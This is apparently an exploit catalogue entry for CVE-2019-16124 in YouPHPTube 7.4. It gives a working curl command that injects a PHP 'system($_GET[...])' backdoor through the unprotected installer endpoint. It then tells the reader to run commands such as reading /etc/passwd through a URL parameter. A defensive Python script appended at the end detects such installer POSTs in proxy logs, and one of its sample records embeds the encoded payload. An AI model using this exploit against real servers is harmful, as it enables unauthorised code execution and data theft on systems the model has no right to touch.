GTFOcurls

CVE-2019-16124

YouPHPTube 7.4 Remote Code Execution

#Quick Info

#Description

  • In YouPHPTube 7.4, the file install/checkConfiguration.php has no access control, so anyone can rewrite the configuration file and insert malicious PHP code.

#Details

#Exploitation

#Payload

To exploit this, we will generate a new malicious config file using the command below. The databaseName must be unique and the databaseHost must be accessible.

curl -s "TARGET/install/checkConfiguration.php" -d "contactEmail=fake-email@fake.com&createTables=2&mainLanguage=RCE&salt=';system(\$_GET['bots']);echo '&systemAdminPass=zerodays.LOL&systemRootPath=/var/www/html/&webSiteRootURL=/var/www/html/&webSiteTitle=Site-Title-Here&databaseHost=127.0.0.1&databaseName=Any-DBname-Here&databasePass=&databasePort=3306&databaseUser=root"

Visit the site and add the parameter bots= to the URL to gain RCE, for example http://put-ip-here/?bots=cat+/etc/passwd.
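For defenders, the request above leaves a recognisable trace: a POST to install/checkConfiguration.php whose form values contain a quote that ends a PHP single-quoted string. The following triage script is an added example, not part of the original page or of YouPHPTube; it assumes a reverse proxy or WAF that records request bodies, and the record layout (`src`, `method`, `url`, `body`) and sample entries are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

INSTALLER_PATH = "/install/checkConfiguration.php"  # endpoint named on this page
# A single quote or backslash can terminate or escape a PHP single-quoted string.
BREAKOUT = re.compile(r"['\\]")

def parse_form(body):
    """Decode an application/x-www-form-urlencoded body, splitting on '&' only."""
    fields = {}
    for pair in filter(None, body.split("&")):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields

def triage(records):
    """Return one finding per POST that reaches the installer endpoint."""
    findings = []
    for rec in records:
        path = urlsplit(rec["url"]).path
        if rec["method"] != "POST" or not path.endswith(INSTALLER_PATH):
            continue
        fields = parse_form(rec["body"])
        risky = sorted(k for k, v in fields.items() if BREAKOUT.search(v))
        findings.append({
            "src": rec["src"],
            # Any post-install POST deserves review; a string breakout is high.
            "severity": "high" if risky else "review",
            "risky_fields": risky,
        })
    return findings

# Constructed sample records (not real traffic); hypothetical record layout.
SAMPLE = [
    {"src": "198.51.100.7", "method": "GET", "url": "http://tube.example/", "body": ""},
    {"src": "203.0.113.9", "method": "POST",
     "url": "http://tube.example/install/checkConfiguration.php",
     "body": "webSiteTitle=My+Site&salt=abc123&databaseHost=127.0.0.1"},
    {"src": "203.0.113.44", "method": "POST",
     "url": "http://tube.example/install/checkConfiguration.php",
     "body": "mainLanguage=RCE&salt=%27%3Bsystem(%24_GET%5B%27bots%27%5D)"
             "%3Becho+%27&databaseName=x"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Because the endpoint has no access control, every finding on an already installed site is worth a look, including the "review" ones.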